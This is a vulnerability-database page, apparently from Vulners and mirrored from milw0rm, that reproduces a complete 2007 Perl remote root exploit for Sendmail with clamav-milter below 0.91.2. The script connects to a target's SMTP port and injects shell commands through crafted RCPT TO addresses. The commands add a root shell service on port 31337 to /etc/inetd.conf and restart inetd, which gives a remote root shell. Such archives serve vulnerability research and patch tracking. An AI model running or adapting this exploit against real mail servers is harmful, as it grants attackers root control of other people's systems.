Lucene search
K

Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 468 Views

Sendmail with clamav-milter Remote Root Exploit - Eliteboy 200

Code

                                                ### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print &#34;Sendmail w/ clamav-milter Remote Root Exploit\n&#34;;
print &#34;Copyright (C) 2007 Eliteboy\n&#34;;

if ($#ARGV != 0) {print &#34;Give me a host to connect.\n&#34;;exit;}

print &#34;Attacking $ARGV[0]...\n&#34;;

$sock = IO::Socket::INET-&#62;new(PeerAddr =&#62; $ARGV[0],
                              PeerPort =&#62; &#39;25&#39;,
                              Proto    =&#62; &#39;tcp&#39;);

print $sock &#34;ehlo you\r\n&#34;;
print $sock &#34;mail from: &#60;&#62;\r\n&#34;;
print $sock &#34;rcpt to: &#60;nobody+\&#34;|echo &#39;31337 stream tcp nowait root /bin/sh -i&#39; &#62;&#62; /etc/inetd.conf\&#34;@localhost&#62;\r\n&#34;;
print $sock &#34;rcpt to: &#60;nobody+\&#34;|/etc/init.d/inetd restart\&#34;@localhost&#62;\r\n&#34;;
print $sock &#34;data\r\n.\r\nquit\r\n&#34;;

while (&#60;$sock&#62;) {
        print;
}

# milw0rm.com [2007-12-21]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
468